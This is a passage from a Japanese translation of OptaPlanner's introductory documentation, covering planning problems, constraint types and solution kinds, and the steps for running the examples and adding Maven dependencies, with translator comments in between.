\u30ea\u30b9\u30af\u5206\u6563\u306a\u3069\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/useCaseOverview.png[]\n\n\u3042\u3089\u3086\u308b\u7d44\u7e54\u304c\u8a08\u753b\u554f\u984c\u306b\u76f4\u9762\u3057\u3066\u3044\u307e\u3059\u3002\u88fd\u54c1\u3084\u30b5\u30fc\u30d3\u30b9\u306f\u3001_\u5236\u7d04\u3092\u53d7\u3051_ \u3001\u9650\u5b9a\u3055\u308c\u305f\u30ea\u30bd\u30fc\u30b9 (\u5f93\u696d\u54e1, \u8cc7\u7523, \u6642\u9593, \u91d1) \u3092\u4f7f\u3063\u3066\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3059\u3002OptaPlanner \u306f\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u3092\u6700\u9069\u5316\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u3088\u308a\u5c11\u306a\u3044\u30ea\u30bd\u30fc\u30b9\u3067\u3088\u308a\u591a\u304f\u306e\u696d\u52d9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001_\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u30ba\u30ea\u30b5\u30fc\u30c1_ \u5206\u91ce\u306e\u4e00\u3064\u3067\u3042\u308b _\u5236\u7d04\u5145\u8db3\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0_ \u3068\u3057\u3066\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150917 Takugo\nSource: Constraint Satisfaction Programming\nInterpreted as: Constraint Programming (without \"satisfaction\") = \u5236\u7d04\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0, not the meaning of programming problem = \u8a08\u753b\u554f\u984c\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/whatIsAPlanningProblem.png[]\n\nOptaPlanner \u306e\u52a9\u3051\u304c\u3042\u308c\u3070\u3001\u666e\u901a\u306e Java(TM) \u30d7\u30ed\u30b0\u30e9\u30de\u30fc\u3067\u3082\u5236\u7d04\u5145\u8db3\u554f\u984c\u3092\u52b9\u7387\u3088\u304f\u89e3\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002OptaPlanner \u306e\u5185\u90e8\u3067\u306f\u3001\u6700\u9069\u5316\u306e\u305f\u3081\u306e\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304a\u3088\u3073\u30e1\u30bf\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304c\u975e\u5e38\u306b\u52b9\u7387\u7684\u306a\u30b9\u30b3\u30a2\u8a08\u7b97\u3068\u7d44\u307f\u5408\u308f\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n\n\n[[requirements]]\n== 1.2. \u5fc5\u8981\u306a\u3082\u306e\n\nOptaPlanner\u306f\u3001link:http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30e9\u30a4\u30bb\u30f3\u30b9 2.0]\u306e\u4e0b\u3067\u914d\u5e03\u3055\u308c\u308b _\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30fb\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2_ \u3067\u3059\u3002\u3053\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u306f\u3001\u975e\u5e38\u306b\u9032\u6b69\u7684\u3067\u3001\u5546\u7528\u76ee\u7684\u3067\u306e\u518d\u4f7f\u7528\u3092\u8a31\u53ef\u3057\u3066\u3044\u307e\u3059\u3002link:http:\/\/www.apache.org\/foundation\/license-faq.html#WhatDoesItMEAN[\u4e00\u822c\u5411\u3051\u8aac\u660e]\u306b\u76ee\u3092\u901a\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nOptaPlanner \u306f\u3001100% \u7d14\u7c8b\u306b Java(TM) \u3067\u4f5c\u3089\u308c\u3066\u304a\u308a\u3001\u30d0\u30fc\u30b8\u30e7\u30f3 1.6 \u4ee5\u4e0a\u306e\u3059\u3079\u3066\u306e JVM \u4e0a\u3067\u52d5\u4f5c\u3057\u307e\u3059\u3002\u4ed6\u306e Java(TM) \u6280\u8853\u3068\u306exref:integration[\u7d71\u5408\u306f\u975e\u5e38\u306b\u7c21\u5358]\u3067\u3059\u3002OptaPlanner \u306f\u3001xref:useWithMavenGradleEtc[Maven Central Repository]\u3067\u5229\u7528\u3067\u304d\u307e\u3059\u3002\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/compatibility.png[]\n\n\n\n[[whatIsAPlanningProblem]]\n== 1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f\n\n[[aPlanningProblemIsNPCompleteOrNPHard]]\n=== 1.3.1. \u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3\n\n\u4e0a\u306b\u6319\u3052\u305f\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u3059\u3079\u3066\u3001_\u304a\u305d\u3089\u304f_ \u3001link:http:\/\/en.wikipedia.org\/wiki\/NP-complete[NP \u5b8c\u5168]\u3082\u3057\u304f\u306f\u305d\u308c\u3088\u308a\u3082\u56f0\u96e3\u306a\u554f\u984c\u3067\u3059\u3002NP \u5b8c\u5168\u3068\u306f\u3001\u666e\u901a\u306e\u8a00\u8449\u3067\u8868\u73fe\u3059\u308b\u3068\u6b21\u306e\u3088\u3046\u306a\u610f\u5473\u3067\u3059\u3002\n\n* \u554f\u984c\u306e\u89e3\u3092\u3001\u7c21\u5358\u306b\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u691c\u8a3c\u3067\u304d\u308b\u3002\n* \u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u898b\u3064\u3051\u308b\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u306a\u3044(*)\u3002\n\n.\u6ce8\u610f\n****\n(*) \u5c11\u306a\u304f\u3068\u3082\u3001\u4e16\u754c\u4e2d\u306e\u982d\u306e\u5207\u308c\u308b\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u79d1\u5b66\u8005\u3067\u3055\u3048\u3001\u307e\u3060\u8ab0\u3082\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u3092\u898b\u51fa\u305b\u3066\u3044\u307e\u305b\u3093\u3002\u3057\u304b\u3057\u3001\u8ab0\u304b\u304c 1 \u3064\u306e NP \u5b8c\u5168\u554f\u984c\u306b\u3064\u3044\u3066\u89e3\u3092\u4e00\u3064\u898b\u3064\u3051\u305f\u3068\u3057\u305f\u3089\u3001\u305d\u306e\u89e3\u306f\u3059\u3079\u3066\u306e NP \u5b8c\u5168\u554f\u984c\u306b\u5f53\u3066\u306f\u307e\u308b\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002\n\u5b9f\u969b\u3001link:http:\/\/en.wikipedia.org\/wiki\/P_%3D_NP_problem[\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u5b9f\u5728\u3059\u308b\u304b\u3069\u3046\u304b]\u3092\u8a3c\u660e\u3057\u305f\u4eba\u306b\u306f 100 \u4e07\u30c9\u30eb\u306e\u61f8\u8cde\u91d1\u304c\u4e0e\u3048\u3089\u308c\u308b\u3053\u3068\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n****\n\n\u3053\u308c\u306f\u5b9f\u306b\u6050\u308d\u3057\u3044\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002\u3064\u307e\u308a\u3001\u6b21\u306e 2 \u3064\u306e\u4e00\u822c\u7684\u306a\u65b9\u6cd5\u304c\u529b\u4e0d\u8db3\u3067\u3042\u308b\u305f\u3081\u306b\u3001\u81ea\u5206\u306e\u62b1\u3048\u308b\u554f\u984c\u3092\u89e3\u304f\u306e\u304c\u3001\u304a\u305d\u3089\u304f\u306f\u60f3\u50cf\u4ee5\u4e0a\u306b\u56f0\u96e3\u3060\u3068\u3044\u3046\u3053\u3068\u3067\u3059\u3002\n\n* \u7dcf\u5f53\u305f\u308a\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u6642\u9593\u304c\u304b\u304b\u308a\u3059\u304e\u308b\u3002\uff08\u305f\u3068\u3048\u5de7\u5999\u306b\u4f5c\u3063\u305f\u5909\u7a2e\u3067\u3042\u3063\u3066\u3082\u3002\uff09\n* \u901f\u6210\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u4f8b\u3048\u3070\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09\u306b\u304a\u3044\u3066 _Largest First \u6cd5\u306b\u5f93\u3063\u3066\u7269\u3092\u5165\u308c\u308b_ \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u3088\u3046\u306b\u3001\u6700\u9069\u89e3\u304b\u3089\u306f\u307b\u3069\u9060\u3044\u89e3\u3092\u8fd4\u3057\u3066\u3057\u307e\u3046\u3002\n\n*OptaPlanner \u306f\u3001\u5148\u9032\u7684\u306a\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u554f\u984c\u306b\u5bfe\u3057\u3066\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u826f\u3044\u89e3\u3092\u898b\u3064\u3051\u51fa\u3057\u307e\u3059\u3002*\n\n\n\n[[aPlanningProblemHasConstraints]]\n=== 1.3.2. \u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09\n\n\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u3001\u5c11\u306a\u304f\u3068\u3082\u6b21\u306e\u3088\u3046\u306a 2 \u3064\u306e\u6c34\u6e96\u306e\u5236\u7d04\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _1 \u4eba\u306e\u5148\u751f\u304c\u7570\u306a\u308b 2 \u3064\u306e\u6388\u696d\u3067\u540c\u6642\u306b\u6559\u3048\u308b\u3053\u3068\u306f\u3067\u304d\u306a\u3044\u3002_ \n* _\u30bd\u30d5\u30c8\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u907f\u3051\u3089\u308c\u308b\u9650\u308a\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f A \u306f\u3001\u91d1\u66dc\u65e5\u306e\u5348\u5f8c\u306b\u6559\u3048\u305f\u304f\u306a\u3044\u3002_ \n\n\u6b21\u306e\u3088\u3046\u306b\u3001\u6b63\u5024\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n* \u53ef\u80fd\u306a\u9650\u308a\u3001_\u6b63\u5024\u306e\u30bd\u30d5\u30c8\u5236\u7d04 (\u307e\u305f\u306f\u5831\u916c)_ \u304c\u6e80\u8db3\u3055\u308c\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f B\u306f\u3001\u6708\u66dc\u65e5\u306e\u671d\u306b\u6559\u3048\u305f\u3044\u3002_ \n\n\u57fa\u672c\u7684\u306a\u554f\u984c (\u4f8b\u3048\u3070 N Queens \u554f\u984c) \u306b\u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04\u306e\u307f\u6301\u3064\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002\u30cf\u30fc\u30c9\u5236\u7d04, \u30df\u30c7\u30a3\u30a2\u30e0\u5236\u7d04, \u30bd\u30d5\u30c8\u5236\u7d04\u3068\u3044\u3063\u305f\u3088\u3046\u306b\u30013 \u3064\u4ee5\u4e0a\u306e\u6c34\u6e96\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u3089\u306e\u5236\u7d04\u306b\u3088\u3063\u3066\u3001\u5404\u554f\u984c\u306e _\u30b9\u30b3\u30a2\u8a08\u7b97\u65b9\u6cd5_ ( _AKA \u9069\u5408\u5ea6\u95a2\u6570_ ) \u304c\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\u4e00\u3064\u306e\u554f\u984c\u306e\u8907\u6570\u306e\u89e3\u305d\u308c\u305e\u308c\u306b\u30b9\u30b3\u30a2\u3092\u4e0e\u3048\u3001\u89e3\u306e\u512a\u52a3\u3092\u4ed8\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002*OptaPlanner \u306e\u30b9\u30b3\u30a2\u5236\u7d04\u306f\u3001Java \u30b3\u30fc\u30c9\u306e\u3088\u3046\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u6307\u5411\u8a00\u8a9e\u307e\u305f\u306f Drools \u30eb\u30fc\u30eb\u306b\u3088\u3063\u3066\u8a18\u8ff0\u3055\u308c\u307e\u3059\u3002* \u305d\u308c\u3089\u306e\u30b3\u30fc\u30c9\u306f\u3001\u7c21\u5358\u3067\u3001\u67d4\u8edf\u6027\u3068\u62e1\u5f35\u6027\u3092\u6709\u3057\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150909 Takugo\nSource: AKA --- plain font\nCorrection assumed: AKA --- italic font\n\/\/\/\/\n\n\n\n[[aPlanningProblemHasAHugeSearchSpace]]\n=== 1.3.3. \u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064\n\n\u4e00\u3064\u306e\u8a08\u753b\u554f\u984c\u306b\u306f\u591a\u6570\u306e _\u89e3_ \u304c\u5b58\u5728\u3057\u307e\u3059\u3002\u89e3\u306b\u306f\u3044\u304f\u3064\u304b\u306e\u7a2e\u985e\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u53ef\u80fd\u89e3_ (_possible solution_) \u306f\u3001\u9055\u53cd\u3059\u308b\u5236\u7d04\u306e\u6570\u3092\u554f\u308f\u305a\u306b\u6319\u3052\u3089\u308c\u308b\u3059\u3079\u3066\u306e\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u89e3\u306e\u591a\u304f\u306b\u4fa1\u5024\u306f\u3042\u308a\u307e\u305b\u3093\u3002\n\/\/\/\/\n150911 Takugo\nSource: possible solution\nTranslation: \u53ef\u80fd\u89e3\n\u5c02\u9580\u7528\u8a9e\u8981\u78ba\u8a8d\n\/\/\/\/\n* _\u5b9f\u884c\u53ef\u80fd\u89e3_ (_feasible solution_) \u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024) \u3092\u4e00\u3064\u3082\u9055\u53cd\u3057\u306a\u3044\u89e3\u3067\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001\u53ef\u80fd\u89e3\u306e\u6570\u3068\u76f8\u95a2\u3092\u6301\u3064\u50be\u5411\u306b\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u3082\u3042\u308a\u307e\u3059\u3002\u3059\u3079\u3066\u306e\u5b9f\u884c\u53ef\u80fd\u89e3\u306f\u53ef\u80fd\u89e3\u3067\u3059\u3002\n* _\u6700\u9069\u89e3_ (_optimal solution_) \u306f\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u30011 \u3064\u304b\u3089\u6570\u500b\u306e\u6700\u9069\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u305b\u305a\u3001\u6700\u9069\u89e3\u304c\u5b9f\u884c\u53ef\u80fd\u3067\u306a\u3044\u5834\u5408\u3067\u3042\u3063\u3066\u3082\u3001\u5c11\u306a\u304f\u3068\u3082 1 \u3064\u306e\u6700\u9069\u89e3\u306f\u5fc5\u305a\u5b58\u5728\u3057\u307e\u3059\u3002\n* _\u6700\u5584\u89e3_ (_best solution found_) \u306f\u3001\u4e0e\u3048\u3089\u308c\u305f\u6642\u9593\u5185\u3067\u306e\u5b9f\u884c\u7d50\u679c\u306b\u898b\u51fa\u3055\u308c\u308b\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u898b\u51fa\u3055\u308c\u305f\u6700\u5584\u89e3\u306f\u3001\u5b9f\u884c\u53ef\u80fd\u3067\u3042\u308b\u5834\u5408\u304c\u591a\u304f\u3001\u6642\u9593\u304c\u5341\u5206\u306b\u4e0e\u3048\u3089\u308c\u308b\u5834\u5408\u306b\u306f\u6700\u9069\u89e3\u3068\u306a\u308a\u307e\u3059\u3002\n\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001(\u3082\u3057\u3082\u6b63\u78ba\u306b\u8a08\u7b97\u3059\u308b\u3068\u3057\u305f\u3089\u3001) \u305f\u3068\u3048\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u304c\u5c0f\u3055\u304f\u3068\u3082\u3001\u76f4\u611f\u306b\u53cd\u3057\u3066\u81a8\u5927\u306b\u306a\u308a\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3067\u78ba\u8a8d\u3067\u304d\u308b\u3088\u3046\u306b\u3001\u307b\u3068\u3093\u3069\u306e\u30b1\u30fc\u30b9\u3067\u3001\u65e2\u77e5\u306e\u5b87\u5b99\u306b\u5b58\u5728\u3059\u308b\u539f\u5b50\u306e\u6570\u306e\u6700\u5c0f\u5024 (10^80^) \u3088\u308a\u3082\u305a\u3063\u3068\u591a\u304f\u306e\u53ef\u80fd\u89e3\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u6700\u9069\u89e3\u3092\u78ba\u5b9f\u306b\u898b\u3064\u3051\u3089\u308c\u308b\u65b9\u6cd5\u304c\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\u3044\u304b\u306a\u308b\u5b9f\u884c\u65b9\u6cd5\u3082\u3001\u305d\u306e\u3059\u3079\u3066\u306e\u53ef\u80fd\u89e3\u306e\u90e8\u5206\u96c6\u5408\u3060\u3051\u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u3057\u304b\u3067\u304d\u307e\u305b\u3093\u3002\n\nOptaPlanner \u306f\u3001\u8907\u6570\u306e\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5099\u3048\u3066\u304a\u308a\u3001\u305d\u306e\u3088\u3046\u306a\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u52b9\u7387\u7684\u306b\u51e6\u7406\u3057\u307e\u3059\u3002\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u6b21\u7b2c\u3067\u3001\u3042\u308b\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u304c\u4ed6\u306e\u3082\u306e\u3088\u308a\u3082\u826f\u597d\u306a\u6027\u80fd\u3092\u793a\u3059\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u305d\u306e\u3053\u3068\u3092\u4e8b\u524d\u306b\u77e5\u308b\u3053\u3068\u306f\u4e0d\u53ef\u80fd\u3067\u3059\u3002*OptaPlanner \u306a\u3089\u3001\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7c21\u5358\u306b\u5207\u308a\u63db\u3048\u3089\u308c\u307e\u3059\u3002* XML \u307e\u305f\u306f\u30b3\u30fc\u30c9\u306e\u4e2d\u306e\u30bd\u30eb\u30d0\u8a2d\u5b9a\u3092\u6570\u884c\u66f8\u304d\u66ff\u3048\u308b\u3060\u3051\u3067\u3059\u3002\n\n\n\n[[downloadAndRunTheExamples]]\n== 1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\n\n[[getTheReleaseZipAndRunTheExamples]]\n=== 1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u4eca\u3059\u3050\u3084\u3063\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n{empty}1. link:https:\/\/www.optaplanner.org\/[OptaPlanner \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8]\u304b\u3089 OptaPlanner \u306e\u516c\u958b .zip \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\n\n{empty}2. \u89e3\u51cd\u3057\u307e\u3059\u3002\n\n{empty}3. +*examples*+ \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u958b\u304d\u3001\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\nLinux \u307e\u305f\u306f Mac:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ .\/runExamples.sh\n----\n\nWindows:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ runExamples.bat\n----\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[] \/\/\nimage:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[]\n\n\u30b5\u30f3\u30d7\u30eb GUI \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u958b\u304d\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3092\u4e00\u3064\u9078\u629e\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/plannerExamplesAppScreenshot.png[]\n\n\n.\u6ce8\u610f\n****\nOptaPlanner \u81ea\u4f53\u306f GUI \u306b\u5bfe\u3057\u3066\u4f9d\u5b58\u6027\u3092\u6301\u3061\u307e\u305b\u3093\u3002OptaPlanner \u306f\u3001\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u4e0a\u3068\u307e\u3063\u305f\u304f\u540c\u69d8\u306b\u3001\u30b5\u30fc\u30d0\u3084\u30e2\u30d0\u30a4\u30eb JVM \u4e0a\u3067\u3082\u52d5\u4f5c\u3057\u307e\u3059\u3002\n****\n\n\n\n[[runTheExamplesInAnIDE]]\n=== 1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u81ea\u5206\u306e\u597d\u307f\u306e IDE \u3067\u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3059\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u3057\u307e\u3059\u3002\n\n{empty}1. IDE \u3092\u8a2d\u5b9a\u3057\u307e\u3059\u3002\n* IntelliJ IDEA \u3068 NetBeans \u3067\u306f\u3001+*examples\/sources\/pom.xml*+ \u3092\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u958b\u304d\u307e\u3059\u3002\u305d\u3046\u3059\u308b\u3060\u3051\u3067\u3001\u6b8b\u308a\u306f Maven \u304c\u7d71\u5408\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n* Eclipse \u3067\u306f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*examples\/sources*+ \u306b\u3064\u3044\u3066\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3092\u958b\u304d\u307e\u3059\u3002\n** \u30d5\u30a1\u30a4\u30eb +*examples\/binaries\/optaplanner-examples-_version_.jar*+ \u3092\u9664\u304f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*bineries*+ \u304a\u3088\u3073 +*examples\/binaries*+ \u306b\u542b\u307e\u308c\u308b\u3059\u3079\u3066\u306e jar \u3092\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u8ffd\u52a0\u3057\u307e\u3059\u3002\n** Java \u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/java*+ \u3068 Java \u30ea\u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/resources*+ \u3092\u8ffd\u52a0\u3057\u307e\u3059\u3002\n\/\/\/\/\n150911 Takugo\nSource: \nAdd all the jars to the classpath from the directory binaries and the directory examples\/binaries\nInterpreted as: \nAdd all the jars in the directories binaries and examples\/binaries to the classpath\n\/\/\/\/\n\n{empty}2. Run \u8a2d\u5b9a\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\n* \u30e1\u30a4\u30f3\u30af\u30e9\u30b9: +org.optaplanner.examples.app.OptaPlannerExamplesApp+\n* VM \u30d1\u30e9\u30e1\u30fc\u30bf (\u30aa\u30d7\u30b7\u30e7\u30f3): +-Xmx512M -server+\n\n{empty}3. \u3053\u306e Run \u8a2d\u5b9a\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n\n[[useWithMavenGradleEtc]]\n=== 1.4.3. OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046\n\nOptaPlanner \u306e jar \u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff08link:https:\/\/repository.jboss.org\/nexus\/index.html#nexus-search;gav~org.optaplanner~~~~[JBoss Maven Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff09\n\/\/\/\/\n150914 Takugo\nSource: central maven repository\nTranslated: Maven Central Respository\n\/\/\/\/\n\nMaven \u3092\u4f7f\u3046\u5834\u5408\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306e +*pom.xml*+ \u3067 +optaplanner-core+ \u306b\u4f9d\u5b58\u6027\u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-core<\/artifactId>\n <\/dependency>\n----\n\n\u3053\u308c\u306f\u3001Gradle, Ivy, Buildr \u306b\u3064\u3044\u3066\u3082\u540c\u69d8\u3067\u3059\u3002\u6700\u65b0\u7248\u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\u4ed6\u306e OptaPlanner \u30e2\u30b8\u30e5\u30fc\u30eb\u3082\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001Maven \u306e +dependencyManagement+ \u3067 +optaplanner-bom+ \u3092\u30a4\u30f3\u30dd\u30fc\u30c8\u3059\u308b\u3053\u3068\u3092\u63a8\u5968\u3057\u307e\u3059\u3002\u3053\u3046\u3057\u3066\u304a\u304f\u3068\u3001OptaPlanner \u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u6307\u5b9a\u306f\u4e00\u56de\u3060\u3051\u3067\u6e08\u307f\u307e\u3059\u3002\n\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-bom<\/artifactId>\n <type>pom<\/type>\n <version>...<\/version>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n <\/dependencyManagement>\n----\n\n\u307e\u3060 (Ivy \u306a\u3057\u3067) ANT \u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306f\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e jar \u3092\u81ea\u5206\u306e\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: copy ... in your class path\nInterpreted as: copy ... to 